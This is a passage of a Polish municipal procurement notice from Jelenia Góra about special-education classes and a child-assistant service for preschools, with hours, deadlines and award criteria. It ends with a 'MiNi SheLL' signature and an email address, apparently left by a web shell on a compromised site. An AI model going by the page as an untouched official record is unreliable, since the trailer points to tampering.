Placówki oświatowe: Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały m.in:
- obserwację psychologiczną;
- rozmowę terapeutyczną;
- metody wielozmysłowego poznawania otoczenia;
- elementy Ruchu Rozwijającego Metoda Weroniki Sherborne;
- metody praktycznego rozwiązywania problemów zw. z sytuacjami społecznym;
- elementy metod wspomagających i alternatywnych sposobów porozumiewania się;
- metody wzmocnień pozytywnych;
- metody praktyczne (wykonywanie czynności praktycznych);
- metody modelowania (nauka poprzez naśladowanie);
- rozmowy z dziećmi o stereotypach i jak w krzywdzący sposób mogą działać na K i M w życiu prywatnym i społecznym, postacie M i K występujące w bajkach/filmach, wybory życiowe niezależne od płci, rozmowa o szacunku do siebie, partnerskie relacje między płciami (st.min.).
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):189 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>XI
                  
                <b>Nazwa: </b>pełnienie funkcji asystenta dziecka<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 19 - pełnienie funkcji asystenta dziecka.

Zajęcia będą obejmowały wspieranie nauczyciela w prowadzonych przez niego zajęciach dydaktycznych, wychowawczych i opiekuńczych, a szczególnie obowiązek realizacji zadań wskazanych przez nauczyciela w:
- realizowaniu programu nauczania skoncentrowanego na dziecku na jego indywidualnym tempie rozwoju i możliwościach uczenia się;
- respektowaniu trójpodmiotowości oddziaływań wychowawczych i kształcących: dziecko-przedszkole-rodzic;
- rozwijaniu predyspozycji i uzdolnień dziecka;
- kształtowaniu u dziecka pozytywnego stosunku do nauki oraz rozwijania ciekawości w poznaniu otaczającego świata;
- wyposażeniu dziecka w umiejętności zgodnie z jego wiekiem;
- zapewnieniu dziecku bezpiecznych, przyjaznych i zdrowych warunków zabawy, działania indywidualnego i zespołowego, rozwijania samodzielności oraz odpowiedzialności za siebie, ekspresji plastycznej, muzycznej i ruchowej, aktywności badawczej oraz twórczej;
- Sprzyjaniu rozwojowi cech osobowości dziecka koniecznych do aktywnego uczestnictwa w życiu społecznym.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):252 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com